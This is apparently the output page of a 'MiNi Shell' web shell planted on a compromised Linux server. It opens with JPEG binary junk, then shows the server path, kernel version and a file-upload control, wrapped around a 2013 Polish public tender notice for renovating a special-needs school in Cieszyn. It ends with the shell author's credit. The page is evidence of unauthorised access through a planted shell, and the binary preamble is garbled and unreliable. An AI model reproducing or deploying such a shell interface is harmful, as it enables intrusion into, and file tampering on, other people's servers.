JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130916/374308-N-2013.html

<p class="kh_header"><b>Cieszyn: Termomodernizacja wraz z przebudową budynku Zespołu Placówek Szkolno-Wychowawczo-Rewalidacyjnych w Cieszynie</b><br>
<b>Numer ogłoszenia: 374308 - 2013; data zamieszczenia: 16.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Cieszyński w imieniu którego występuje Zarząd Powiatu Cieszyńskiego , ul. Bobrecka 29, 43-400 Cieszyn, woj. śląskie, tel. 33 4777213, faks 33 4777133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.cieszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja wraz z przebudową budynku Zespołu Placówek Szkolno-Wychowawczo-Rewalidacyjnych w Cieszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie kompleksowej termomodernizacji wraz z przebudową budynku Zespołu Placówek Szkolno-Wychowawczo-Rewalidacyjnych przy ul. Wojska Polskiego w Cieszynie.
2.  Zakres robót obejmuje:
1)Kompleksową termomodernizację wraz z przebudową budynku Zespołu Placówek Szkolno-Wychowaczo-Rewalidacyjnych:
a Przebudowę pomieszczeń kuchni wraz z zapleczem z uwagi na:  
- zmianę ciągu technologicznego kuchni,  
- podniesienie poziomu użytkowego pomieszczeń kuchni i zaplecza z dostosowaniem do poziomu użytkowego parteru budynku,  
- budowę gospodarczego wyjścia zewnętrznego,  
- budowę windy wewnętrznej towarowej
b wymianę posadzek lastrykowych na ciągach komunikacyjnych: schodach i korytarzach (z zastosowaniem ogrzewania podłogowego),
c adaptację byłego pomieszczenia hurtowni dla potrzeb placówki, 
d dostosowanie wybranych pomieszczeń internatu i wybranych pomieszczeń dydaktycznych dla potrzeb placówki, polegające na przebudowie ścian działowych, wymianie posadzek i okładzin ściennych oraz robotach wykończeniowych,
e remont łazienek z dostosowaniem dla osób niepełnosprawnych,
f budowę windy osobowej wewnętrznej przeszklonej,
g wymianę stolarki drzwiowej wewnętrznej,
h wymianę stolarki okiennej,
i renowację drzwi zewnętrznych wejścia głównego, 
j renowację elewacji budynku z zastosowaniem tynków ciepłochronnych,
k ocieplenie stropu nad II piętrem (w podłodze poddasza),
l wymianę orynnowania, okuć, naprawę kominów, konserwację pokrycia dachowego,  
m ocieplenie ścian fundamentowych kondygnacji piwnicy z wykonaniem izolacji pionowej i drenażu opaskowego wokół budynku,
n wykonanie nadproży stalowych,
o wykonanie ścianki obudowy szybu windowego małotowarowego,
p wykonanie drewnianej konstrukcji wsporczej pod kolektory słoneczne,
q montaż platformowej windy dla osób niepełnosprawnych z szybem i obudową z napędem elektrycznym śrubowym,
r wykonanie  wyciągowej  instalacji wentylacji mechanicznej w pomieszczeniach sanitariatów, oraz montaż nawietrzaków okiennych higrosterowalnych z okapami w oknach i okiennych nawietrzaków ciśnieniowych z okapami w pomieszczeniach z urządzeniami gazowymi
s malowanie pokrycia dachowego i renowacja kominów,
t montaż poręczy, uchwytów i podpór w łazienkach przeznaczonych dla osób niepełnosprawnych,
u wykonanie robót towarzyszących i wykończeniowych,
v wywóz gruzu i wyrobów odpadowych. 2)Montaż instalacji c.o. w tym:montaż instalacji centralnego ogrzewania zaprojektowanej w systemie dwururowym z rozdziałem dolnym dla parametrów 70/50 stopni C , w tym instalacji ogrzewania podłogowego.
3)Montaż instalacji wody zimnej, ciepłej i cyrkulacji, w tym:montaż instalacji wody zimnej, ciepłej i cyrkulacji z rur PP stabilizowanych wkładką z aluminium lub włókna szklanego.
4)Montaż wewnętrznej instalacji gazowej, w tym:
a montaż instalacji z rur stalowych czarnych bez szwu,
b montaż gazowych pieców grzewczych i kuchni gazowych, 
c montaż instalacji antywypływowej gazu.
5)Montaż instalacji kanalizacji sanitarnej- Montaż instalacji kanalizacji wewnętrznej z rur PVC-U łączonych na uszczelki 
6)Montaż instalacji elektrycznej, w tym:
a montaż rozdzielni RK oraz zmiany w rozdzielniach TRWT, RP1, RG, R2.1, RDO, RC,
b montaż wewnętrznych linii zasilających,
c montaż oświetlenia podstawowego i ewakuacyjnego pomieszczeń,
d montaż instalacji gniazd wtykowych ogólnego przeznaczenia,
e montaż instalacji zasilania urządzeń wentylacji mechanicznej,
f montaż instalacji sterowania pracą pomp obiegowych, panelami solarnymi, wentylacją,
g montaż instalacji podgrzewania wody użytkowej,
h montaż instalacji sterowania otwierania drzwi wejściowych, 
i montaż instalacji czujek gazowych,
j montaż ochrony przed dotykiem pośrednim,
k montaż ochrony przepięciowej III-go stopnia,
l montaż połączenia wyrównawczego,
m montaż uziemienia.
7) Kotłownia gazowa:
a montaż dwóch wysokosprawnych kondensacyjnych kotłów gazowych o mocy 170 kW każdy,
b montaż kompletnej automatyki kontrolno-pomiarowej i regulacyjnej,
c montaż zabezpieczenia układu grzewczego, 
d montaż naczynia wzbiorczego przeponowego o pojemności 500 litrów,
e montaż zaworów bezpieczeństwa. 
8) Montaż instalacji wentylacji mechanicznej, w tym:
montaż wentylacji mechanicznej nawiewno-wywiewnej dla pomieszczeń: sale jadalni, kuchnia główna z zapleczem, sala gimnastyczna i sala integracji sensorycznej na parterze, sala korekcyjno-rehabilitacyjna i pracownia arteterapi na II piętrze.
9) Montaż instalacji solarnej, w tym:
a montaż sześciu rurowych kolektorów próżniowych 3 m2,
b montaż zasobnika buforowego c.w.u. o pojemności 1000 l,
c montaż jednowężownicowego zasobnika c.w.u. o pojemności 1000 l,
d montaż wymiennika płytowego,
e montaż naczynia wzbiorczego Reflex S50,
f montaż automatyki i sterowania.
10)Remont dojść i dojazdów, w tym:
a wykonanie robót ziemnych,
b wykonanie nawierzchni utwardzonych z kostki brukowej betonowej gr. 6 i 10 cm,
c wykonanie odwodnienia chodnika, drogi dojazdowej i placów manewrowych,
d wykonanie schodów zewnętrznych i pochylni z żelbetu monolitycznego,
e wykonanie schodów zewnętrznych dostawczych,
f wykonanie balustrady z profili rurowych ocynkowanych malowanych proszkowo,
g wywóz ziemi,
h wykonanie rekultywacji terenu.
11)Rozbiórka budynku garażowo-gospodarczego, w tym:
a roboty przygotowawcze,
b rozbiórka budynku,
c wywóz gruzu i wyrobów odpadowych,
d uporządkowanie terenu.
3.Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, które stanowią załącznik do niniejszej SIWZ.
4.Zamieszczone w projekcie, Specyfikacji Technicznej Wykonania i Odbioru Robót lub SIWZ nazwy wyrobów, marki producentów itp. należy traktować jako przykładowe. Dopuszcza się możliwość zastosowania wyrobów innych marek i producentów pod warunkiem, że będą posiadać parametry techniczne i właściwości użytkowe porównywalne do wyrobów opisanych w projekcie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.42.20-8, 45.21.00.00-2, 45.21.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości: 100.000zł (słownie: sto tysięcy  złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony jeśli Wykonawca udokumentuje, że wykonał w okresie 5 lat maksymalnie 4 robót budowlanych o łącznej wartości minimum 4.000.000 zł brutto polegającą na wykonaniu robót termomodernizacyjnych z czego wartość robót ogólnobudowlanych   i konstrukcyjnych musi wynieść minimum 3.200.000 zł, sanitarnych minimum 700.000 zł, elektrycznych 100.000 zł wartości robót</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony jeśli Wykonawca wykaże, że dysponuje osobą posiadającą uprawnienia budowlane w zakresie niezbędnym do wykonania zmówienia w specjalnościach:
- konstrukcyjno-budowlanej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek znajdowania się w sytuacji ekonomicznej i finansowej zostanie uznany za spełniony jeśli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1.000.000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca udokumentuje, że wykonał w okresie 5 lat maksymalnie 4 robót budowlanych o łącznej wartości minimum 4.000.000 zł brutto polegającą na wykonaniu robót termomodernizacyjnych z czego wartość robót ogólnobudowlanych   i konstrukcyjnych musi wynieść minimum 3.200.000 zł, sanitarnych minimum 700.000 zł, elektrycznych 100.000 zł wartości robót;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy; - dokumenty w zakresie umocowania prawnego do podpisywania oferty, zgodnie z pkt 10.7 niniejszej SIWZ; - jeżeli Wykonawca zamierza powierzyć Podwykonawcy do wykonania część robót budowlanych powinien on złożyć oświadczenie o zakresie robót budowlanych do wykonania przez Podwykonawcę zgodnie z załącznikiem nr 7 SIWZ; - kserokopia wadium;- kosztorys ofertowy wg załączonego wzoru kosztorysu uproszczonego ślepego wraz z podaną przyjętą wartością  r-g  i poziomem narzutów oraz wykaz zastosowanych materiałów i sprzętu wraz z podaniem cen jednostkowych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy mogą nastąpić w następujących przypadkach:
a) zmiana (przedłużenie) terminu wykonania zamówienia dopuszczalna jest tylko w przypadku:
- wystąpienia okoliczności, których nie można było wcześniej przewidzieć w szczególności w razie konieczności wykonania zamówień dodatkowych, o których mowa w art. 67 ust 1 pkt 5 ustawy prawo zamówień publicznych, których wykonanie jest niezbędne do prawidłowego zakończenia przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu oraz wystąpienia nietypowych warunków atmosferycznych mających istotny wpływ na prowadzenie robót budowlanych zgodnie z technologią ich wykonania
- wydłużających się procedur w pozyskiwaniu środków finansowych. Zamawiający zastrzega sobie prawo wydłużenia realizacji inwestycji do 2015r.
b zmiany przepisów mających wpływ na treść zawartej umowy,
c zmiana osoby odpowiedzialnej za wykonanie zamówienia ze strony Wykonawcy 
i Zamawiającego - może ulec zmianie tylko na podstawie obiektywnych przesłanek. Osoba ze strony Wykonawcy musi posiadać kwalifikacje zawodowe nie gorsze niż wymagał Zamawiający w SIWZ. Osoba ta musi zostać zaakceptowana przez Zamawiającego.
2.Wszelkie istotne zmiany postanowień zawartej umowy powinny zostać wprowadzone drogą pisemnego aneksu do umowy pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.cieszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn, pokój 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2013 godzina 09:00, miejsce: Kancelaria Ogólna Starostwa Powiatowego w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com